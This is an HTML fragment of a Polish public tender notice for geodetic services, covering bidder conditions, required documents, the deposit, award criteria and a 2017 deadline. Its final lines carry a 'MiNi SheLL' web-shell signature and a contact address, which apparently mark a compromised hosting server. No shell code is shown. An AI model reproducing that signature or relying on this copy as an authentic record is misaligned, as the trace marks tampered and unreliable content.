<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 15/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający wymaga aby Wykonawca był ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia tj:
a) jeśli wykonawca składa ofertę na I zadanie - w wysokości min. 100.000 PLN.
b) jeśli wykonawca składa ofertę na II zadanie - w wysokości min. 100.000 PLN.
Jeśli wykonawca składa ofertę na I i II zadanie - w wysokości 200.000 zł. <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający wymaga aby wykonawca spełniał
minimalne warunki jn:
a) wykonał a w przypadku świadczeń okresowych lub ciągłych w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługi w zakresie jn:
- jeśli Wykonawca składa ofertę na dwie części zamówienia:
co najmniej 40 opracowań określonych w zakresie V (podziały geodezyjne) i zakresie VI (aktualizacja użytków gruntowych) szczegółowego opisu przedmiotu zamówienia, co najmniej 20 opracowań określonych w zakresie II (aktualizacja mapy zasadniczej)
szczegółowego opisu przedmiotu zamówienia oraz co najmniej 20 opracowań określonych w zakresie I (dokumentacja geodezyjna i prawna dla celów regulacji stanów prawnych) szczegółowego opisu przedmiotu zamówienia

 
- w przypadku gdy Wykonawca składa ofertę na jedną część zamówienia:
co najmniej 20 opracowań określonych w zakresie V (podziały geodezyjne) i zakresie VI (aktualizacja użytków gruntowych) szczegółowego opisu przedmiotu zamówienia, co najmniej 10 opracowań określonych w zakresie II (aktualizacja mapy zasadniczej)
szczegółowego opisu przedmiotu zamówienia oraz co najmniej 10 opracowań określonych w zakresie I (dokumentacja geodezyjna i prawna dla celów regulacji stanów prawnych) szczegółowego opisu przedmiotu zamówienia
b) dysponował osobami posiadającymi niżej określone kwalifikacje zawodowe, uprawnienia, doświadczenie oraz wykształcenie niezbędne do wykonania zamówienia publicznego,

 
- co najmniej dwoma osobami (na każde zadanie) posiadającymi uprawnienia geodezyjne określone
w art. 43 pkt 1 ustawy prawo geodezyjne i kartograficzne z dnia 17 maja 1989r. - Prawo geodezyjne i kartograficzne (Dz. U. z 2015r. poz. 520 z późn. zm.)
- oraz co najmniej dwoma osobami (na każde zadanie) posiadającymi uprawnienia geodezyjne określone w art. 43 pkt 2 ustawy prawo geodezyjne i kartograficzne z dnia 17 maja 1989r. - Prawo geodezyjne i kartograficzne (Dz. U. z 2015r. poz. 520 z późn. zm)
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                Uwaga! W przypadku gdy Wykonawca składa ofertę na dwie części zamówienia osoba wskazana do wykonania jednej części zamówienia nie może być wskazana jako wykonująca drugą część zamówienia.</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu wykonawca którego oferta została najwyżej oceniona winien przedłożyć:

 
zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;
oświadczenie wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo  w przypadku wydania takiego wyroku lub decyzji  dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;
oświadczenie wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne;
oświadczenie wykonawcy o braku wydania prawomocnego wyroku sądu skazującego za wykroczenie na karę ograniczenia wolności lub grzywny w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy;
oświadczenie wykonawcy o braku wydania wobec niego ostatecznej decyzji administracyjnej o naruszeniu obowiązków wynikających z przepisów prawa pracy, prawa ochrony środowiska lub przepisów o zabezpieczeniu społecznym w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 7 ustawy;
oświadczenie wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716)

 
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 49:

 
1) pkt 1-3  składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Dokument, powinien być wystawiony nie wcześniej niż
3 miesiące przed upływem składania ofert.
b) nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Dokument, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1) W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących sytuacji finansowej lub ekonomicznej zamawiający wymaga od wykonawcy, którego oferta została najwyżej oceniona przedłożenia dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną: jak określono w punkcie 15.1. niniejszej SIWZ.
Uwaga: Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego dokumentów, o których mowa w pkt 49 zamawiający dopuszcza złożenie przez wykonawcę innych dokumentów, o których mowa w art. 26 ust. 2c ustawy.
W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej zamawiający wymaga od wykonawcy, którego oferta została najwyżej oceniona przedłożenia:

 
2) wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
3) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.

 
Uwaga. Jeżeli wykaz, oświadczenia lub inne złożone przez wykonawcę dokumenty budzą wątpliwości zamawiającego, może on zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były wykonane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, o dodatkowe informacje lub dokumenty w tym zakresie.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wykonawca powinien zgodnie z art. 45 ust. 3 ustawy przed upływem terminu składania ofert wnieść wadium przetargowe w wysokości :
na zadanie nr 1  2.000 PLN
na zadanie nr 2  2.000 PLN</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena ofertowa</td><td>60</td></tr><tr><td>Doświadczenie osób wyznaczonych do realizacji zamówienia</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zmiana postanowień umowy może nastąpić wyłącznie na warunkach określonych poniżej :
a) nastąpi zmiana obowiązującej stawki VAT ;
b) wystąpią inne przyczyny niezależne i niezawinione przez Wykonawcę (zdarzenia losowe) uzasadniające przedłużenie czasu wykonywania przedmiotu umowy 
2. Zmiana umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie, pod rygorem  nieważności.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 13/02/2017, godzina: 10:45,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Wykonawca zobowiązany jest złożyć w terminie wskazanym w pkt 39 SIWZ:
1) Ofertę na formularzu oferty, o treści zgodnej z określoną we wzorze stanowiącym załącznik do specyfikacji. 
2) Aktualne na dzień składania ofert oświadczenie stanowiące wstępne potwierdzenie, ze wykonawca:
- nie podlega wykluczeniu z postępowania
- spełnia warunki udziału w postępowaniu  
  w formie określonej w  załączniku nr 2 i 4 do SIWZ 
3) Jeśli Wykonawca będzie polegać na zdolnościach lub sytuacji innych podmiotów - zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia;
4) Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.
W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane.
5) Dowód wniesienia wadium;
6) W przypadku, gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np. spółki cywilne, konsorcja) - wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Fakt ustanowienia pełnomocnika należy udokumentować dołączeniem pełnomocnictwa podpisanego przez wszystkich wykonawców wspólnie ubiegających się o zamówienie. Pełnomocnictwo winno być w formie oryginału lub notarialnie poświadczonej kopii. Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy;
7) Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, zamawiający może na każdym etapie postępowania wezwać wykonawców do złożenia wszystkich lub niektórych oświadczeń lub dokumentów potwierdzających, że nie podlegają wykluczeniu, spełniają warunki udziału w postępowaniu, a jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio oświadczenia lub dokumenty nie są już aktualne, do złożenia aktualnych oświadczeń lub dokumentów 
8) Wykonawca, w terminie 3 dni od dnia przekazania informacji - od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 3, przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
9) Oświadczenie, o którym mowa w pkt. 16 niniejszej SIWZ wykonawca składa zgodnie z wzorem załączonym do SIWZ 2 i 3.  </div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com